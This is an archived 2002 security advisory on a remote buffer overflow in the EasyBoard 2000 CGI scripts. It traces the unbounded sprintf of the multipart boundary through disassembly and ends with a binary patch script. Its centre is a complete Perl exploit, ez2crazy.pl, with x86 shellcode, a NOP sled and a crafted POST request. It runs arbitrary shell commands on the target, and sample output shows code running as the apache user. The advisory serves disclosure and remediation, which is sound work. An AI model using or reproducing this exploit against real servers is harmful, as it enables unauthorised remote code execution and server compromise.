12th Feb 2002 [SBWID-5089]
COMMAND
EasyBoard 2000 Remote Buffer Overflow Vulnerability
SYSTEMS AFFECTED
EasyBoard 2000 1.27xx
PROBLEM
Jin Ho You [jhyou@chonnam.chonnam.ac.kr] posted a nice analysis and
exploit :
Vulnerability Analysis :
Vulnerable CGIs
===============
Vulnerable CGIs are ezboard.cgi, ezman.cgi and ezadmin.cgi.
$ strings ezboard.cgi | grep -- \"--%s\"
--%s
$ strings ezman.cgi | grep -- \"--%s\"
--%s
$ strings ezadmin.cgi | grep -- \"--%s\"
--%s
Analysis of ezboard.cgi
=======================
$ objdump -s ezboard.cgi | less
806ad60 4700504f 53540043 4f4e5445 4e545f54 G.POST.CONTENT_T
806ad70 59504500 00000000 00000000 00000000 YPE.............
806ad80 6170706c 69636174 696f6e2f 782d7777 application/x-ww
806ad90 772d666f 726d2d75 726c656e 636f6465 w-form-urlencode
806ada0 64002600 3d007365 6c6e756d 00434f4e d.&.=.selnum.CON
806adb0 54454e54 5f4c454e 47544800 00000000 TENT_LENGTH.....
806adc0 6d756c74 69706172 742f666f 726d2d64 multipart/form-d
806add0 6174613b 20626f75 6e646172 793d002d ata; boundary=.- <-- 0x806addf
806ade0 2d257300 0d0a2573 00000000 00000000 -%s...%s........ \"--%s\"
806adf0 00000000 00000000 00000000 00000000 ................
806ae00 436f6e74 656e742d 44697370 6f736974 Content-Disposit
806ae10 696f6e3a 20666f72 6d2d6461 74613b20 ion: form-data;
806ae20 002d2d00 3b206669 6c656e61 6d650025 .--.; filename.%
$ objdump -d ezboard.cgi | less
804aff5: 57 push %edi
804aff6: 68 df ad 06 08 push $0x806addf ---> \"--%s\"
804affb: 8d 9d e8 fe ff ff lea 0xfffffee8(%ebp),%ebx
804b001: 53 push %ebx
804b002: e8 89 e5 ff ff call 0x8049590
$ gdb ezboard.cgi
(gdb) disassemble 0x804aff6
0x804af84 <strcpy+6500>: push %ebp
0x804af85 <strcpy+6501>: mov %esp,%ebp
0x804af87 <strcpy+6503>: push %edi
0x804af88 <strcpy+6504>: push %esi
0x804af89 <strcpy+6505>: push %ebx
0x804af8a <strcpy+6506>: sub $0x648,%esp
0x804af90 <strcpy+6512>: mov $0x806adc0,%edi
0x804af95 <strcpy+6517>: cld
0x804af96 <strcpy+6518>: mov $0xffffffff,%ecx
0x804af9b <strcpy+6523>: mov $0x0,%al
0x804af9d <strcpy+6525>: repnz scas %es:(%edi),%al
0x804af9f <strcpy+6527>: not %ecx
0x804afa1 <strcpy+6529>: dec %ecx
0x804afa2 <strcpy+6530>: mov %ecx,0xfffff9e0(%ebp)
delim_len = strlen(\"multipart/form-data; boundary=\");
0x804afa8 <strcpy+6536>: push $0x806ad67 \"CONTENT_TYPE\"
0x804afad <strcpy+6541>: call 0x8049210 <getenv>
0x804afb2 <strcpy+6546>: mov %eax,%ebx
content_type = getenv(\"CONTENT_TYPE\");
0x804afb4 <strcpy+6548>: lea 0xfffff9e4(%ebp),%eax
0x804afba <strcpy+6554>: mov %eax,(%esp,1)
0x804afbd <strcpy+6557>: call 0x804aee4 <strcpy+6340>
0x804afc2 <strcpy+6562>: mov %eax,%esi
0x804afc4 <strcpy+6564>: sub $0x8,%esp
0x804afc7 <strcpy+6567>: push $0x806adc0
0x804afcc <strcpy+6572>: push %ebx
0x804afcd <strcpy+6573>: call 0x8049360 <strstr>
(gdb) x/s 0x806adc0
0x806adc0 <_IO_stdin_used+1756>: \"multipart/form-data; boundary=\"
delim = strstr(content_type, \"multipart/form-data; boundary=\");
0x804afd2 <strcpy+6578>: add $0x20,%esp
0x804afd5 <strcpy+6581>: mov %eax,%edi
0x804afd7 <strcpy+6583>: test %edi,%edi
0x804afd9 <strcpy+6585>: jne 0x804afec <strcpy+6604>
0x804afdb <strcpy+6587>: sub $0xc,%esp
0x804afde <strcpy+6590>: pushl 0x806fe6c
0x804afe4 <strcpy+6596>: call 0x804cc2c <strcpy+13836>
0x804afe9 <strcpy+6601>: add $0x10,%esp
0x804afec <strcpy+6604>: add 0xfffff9e0(%ebp),%edi
delim += delim_len;
0x804aff2 <strcpy+6610>: sub $0x4,%esp
0x804aff5 <strcpy+6613>: push %edi
0x804aff6 <strcpy+6614>: push $0x806addf
0x804affb <strcpy+6619>: lea 0xfffffee8(%ebp),%ebx
0x804b001 <strcpy+6625>: push %ebx
0x804b002 <strcpy+6626>: call 0x8049590 <sprintf>
char boundary[280];
sprintf(boundary, \"--%s\", delim);
The disassembled code is like the C code:
parse_multipart()
{
char boundary[280];
...
delim = strstr(getenv(\"CONTENT_TYPE\"), \"multipart/form-data; boundary=\");
delim += strlen(\"multipart/form-data; boundary=\");
sprintf(boundary, \"--%s\", delim);
...
}
We can see that sprintf() function call can create buffer overflow
condition.
Exploit :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cut here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
# ez2crazy.pl
#
# Remote Buffer Overflow x86 Linux Exploit for
# CrazyWWWBoard(http://www.crazywwwboard.com),
# EasyBoard 2000(http://ezboard.new21.org) and
# CGIs using qDecoder 4.0~5.0.8
#
# Excessive boundary delimiter string in the header
# \"Content-Type: multipart/form-data\" permits the buffer overflow attack.
#
# Programmed by Jin Ho You, jhyou@chonnam.chonnam.ac.kr, 2002/02/11
$usage =
\"usage: ez2crazy.pl [options] CGI-URL\\n
CGI-URL URL of the target CGI
-c command Bourne shell command
Default: \'/bin/echo 00ps, Crazy!;id\'
-o offset Offset of the egg shell code,
Recommended [-300,+300]
example)
ez2crazy.pl http://target.com:8080/cgi-bin/vulnerable.cgi
ez2crazy.pl -o -47 target.com/cgi-bin/vulnerable.cgi
ez2crazy.pl -c \'echo vulnerable.cgi has a security hole! | mail root\' \\\\
target.com/cgi-bin/vulnerable.cgi
\";
use Getopt::Std;
getopt(\'oc\');
if ($#ARGV < 0) {
print $usage;
exit(0);
};
$cgiurl = $ARGV[0];
$command = $opt_c ? $opt_c : \"/bin/echo 00ps, Crazy!;id\";
$offset = $opt_o ? $opt_o : 0;
$cgiurl =~ s/http:\\/\\///;
($host, $cgiuri) = split(/\\//, $cgiurl, 2);
($host, $port) = split(/:/, $host);
$port = 80 unless $port;
$command = \"/bin/echo Content-Type: text/html;/bin/echo;($command)\";
$cmdlen = length($command);
$argvp = int((0x0b + $cmdlen) / 4) * 4 + 4;
$shellcode =
\"\\xeb\\x37\" # jmp 0x37
. \"\\x5e\" # popl %esi
. \"\\x89\\x76\" . pack(C, $argvp) # movl %esi,0xb(%esi)
. \"\\x89\\xf0\" # movl %esi,%eax
. \"\\x83\\xc0\\x08\" # addl $0x8,%eax
. \"\\x89\\x46\" . pack(C, $argvp + 4) # movl %eax,0xb(%esi)
. \"\\x89\\xf0\" # movl %esi,%eax
. \"\\x83\\xc0\\x0b\" # addl $0xb,%eax
. \"\\x89\\x46\" . pack(C, $argvp + 8) # movl %eax,0xb(%esi)
. \"\\x31\\xc0\" # xorl %eax,%eax
. \"\\x88\\x46\\x07\" # movb %eax,0x7(%esi)
. \"\\x4e\" # dec %esi
. \"\\x88\\x46\\x0b\" # movb %eax,0xb(%esi)
. \"\\x46\" # inc %esi
. \"\\x88\\x46\" . pack(C, 0x0b + $cmdlen) # movb %eax,0xb(%esi)
. \"\\x89\\x46\" . pack(C, $argvp + 12) # movl %eax,0xb(%esi)
. \"\\xb0\\x0b\" # movb $0xb,%al
. \"\\x89\\xf3\" # movl %esi,%ebx
. \"\\x8d\\x4e\" . pack(C, $argvp) # leal 0xb(%esi),%ecx
. \"\\x8d\\x56\" . pack(C, $argvp + 12) # leal 0xb(%esi),%edx
. \"\\xcd\\x80\" # int 0x80
. \"\\x31\\xdb\" # xorl %ebx,%ebx
. \"\\x89\\xd8\" # movl %ebx,%eax
. \"\\x40\" # inc %eax
. \"\\xcd\\x80\" # int 0x80
. \"\\xe8\\xc4\\xff\\xff\\xff\" # call -0x3c
. \"/bin/sh0-c0\" # .string \"/bin/sh0-c0\"
. $command;
$offset -= length($command) / 2 + length($host . $port . $cgiurl);
$shelladdr = 0xbffffbd0 + $offset;
$noplen = 242 - length($shellcode);
$jump = $shelladdr + $noplen / 2;
$entries = $shelladdr + 250;
$egg = \"\\x90\" x $noplen . $shellcode . pack(V, $jump) x 9
. pack(V, $entries) x 2 . pack(V, $jump) x 2;
$content = substr($egg, 254) .
\"--\\r\\nContent-Disposition: form-data; name=\\\"0\\\"\\r\\n\\r\\n0\\r\\n--$egg--\\r\\n\";
$contentlength = length($content);
$exploit =
\"POST /$cgiuri HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.72 [ko] (X11; I; Linux 2.2.14 i686)
Host: $host:$port
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: ko
Accept-Charset: euc-kr,*,utf-8
Content-type: multipart/form-data; boundary=$egg
Content-length: $contentlength
$content
\";
use Socket;
$iaddr = inet_aton($host) or die(\"Error: $!\\n\");
$paddr = sockaddr_in($port, $iaddr) or die(\"Error: $!\\n\");
$proto = getprotobyname(\'tcp\') or die(\"Error: $!\\n\");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die(\"Error: $!\\n\");
connect(SOCKET, $paddr) or die(\"Error: $!\\n\");
send(SOCKET, $exploit, 0) or die(\"Error: $!\\n\");
while (<SOCKET>) {
print;
}
close(SOCKET);
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cut here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- example
$ ./ez2crazy.pl -o -250 http://vulnerable.net/ezboard/ezboard.cgi
HTTP/1.1 200 OK
Date: Sun, 10 Feb 2002 19:08:46 GMT
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6
DAV/1.0.2 PHP/4.0.4pl1 mod_perl/1.24_01
Connection: close
Content-Type: text/html
00ps, Crazy!
uid=48(apache) gid=48(apache) groups=48(apache)
SOLUTION
The vulnerability can be fixed by replacing sprintf(boundary, \"--%s\",
delim) with sprintf(boundary, \"--%.200s\", delim).
The following code fixes the binary programs of EasyBoard 2000 x86
Linux version.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cut here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
# ezboard-fix.pl
#
# EasyBoard 2000 Buffer Overflow Vulnerability Fix for x86 Linux version
#
# Run this program in the directory where ezboard.cgi exists.
#
# Programmed by Jin Ho You, jhyou@chonnam.chonnam.ac.kr, 2002/02/11
LOOP:
for $cgi_file (\"ezboard.cgi\",\"ezadmin.cgi\", \"ezman.cgi\") {
if (! -e $cgi_file) {
print \"$cgi_file does not exist.\\n\";
next LOOP;
}
$cgi_content=`cat $cgi_file`;
if (index($cgi_content, \"EasyBoard 2000\") == -1 ||
index($cgi_content, \"ld-linux.so\") == -1) {
print \"$cgi_file is not EasyBoard 2000 for x86 Linux.\\n\";
next LOOP;
}
@obj_header = split(\' \', `objdump -h $cgi_file | grep rodata`);
$moff_section = hex($obj_header[3]);
$foff_section = hex($obj_header[5]);
$foff_fmtstr = index($cgi_content, \"--%s\");
$moff_fmtstr = $moff_section + $foff_fmtstr - $foff_section;
$foff_push = index($cgi_content, pack(\"V\",$moff_fmtstr));
if ($foff_push == -1) {
print \"$cgi_file is already fixed!\\n\";
next LOOP;
}
printf \"$cgi_file: \'--%%s\' = 0x%08x, push \'--%%s\' = 0x%08x\\n\",
$foff_fmtstr, $foff_push;
open(CGI, \"+<$cgi_file\") or die \"cannot open $cgi_file: $!\";
seek(CGI, $foff_fmtstr + 17, SEEK_SET);
print CGI \"--%.200s\";
seek(CGI, $foff_push, SEEK_SET);
print CGI pack(\"V\", $moff_fmtstr + 17);
close(CGI);
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cut here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
